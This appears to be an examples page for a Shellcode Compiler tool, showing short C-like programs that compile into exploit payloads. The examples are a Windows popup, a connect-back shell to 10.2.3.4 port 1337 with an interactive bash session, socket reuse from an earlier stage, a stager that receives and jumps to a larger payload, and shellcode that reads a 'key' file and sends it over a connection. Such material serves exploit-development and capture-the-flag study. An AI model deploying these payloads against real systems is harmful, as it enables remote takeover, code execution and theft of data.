Shellcode Compiler Examples =========================== :toc: The following are short examples of how to use the Shellcode Compiler to solve common shellcoding tasks. Resolve and call Windows functions ---------------------------------- SCC supports the ability to dynamically resolve and call windows functions for you with the right syntax. The following simple example is a popup displaying hello world using MessageBoxA. --------------------------------------- int __stdcall MessageBoxA(HANDLE hwnd, const char* msg, const char* title, uint32_t flags) __import("user32"); int main() { MessageBoxA(NULL, "Hello", "Hello World.", 0); return 0; } --------------------------------------- Connect-back Shell ------------------ The following code will connect to 10.2.3.4 on port 1337 with an interactive bash session. --------------------------------------- void main() { int s = create_tcp4_connection(IPV4_ADDR(10, 2, 3, 4), 1337); redirect_io(s); interactive_bash(); } --------------------------------------- Passing socket descriptor from previous stage --------------------------------------------- The main() function can take arguments, which are to be passed on the stack from right to left (C calling convention). When you transition to this shellcode, use a standard call instruction with the socket pushed onto the stack. --------------------------------------- void main(int sock) { redirect_io(sock); interactive_bash(); } --------------------------------------- Staged shellcode ---------------- You can use the computed goto syntax to transition to a new, larger shellcode buffer. The following example allocates a new buffer on the heap for shellcode of an arbitrary size. --------------------------------------- void main(int sock) { int len; recv(sock, &len, 4, 0); void* code = malloc(len); recv_all(sock, code, len, 0); goto *code; } --------------------------------------- Read a file ----------- The following shellcode reads a small file called `key` and sends it back over file descriptor 4, which is typically the incoming connection on a forking server. --------------------------------------- void main() { char data[64]; int fd = open("key", O_RDONLY, 0); int len = read(fd, data, 64); write(4, data, len); } ---------------------------------------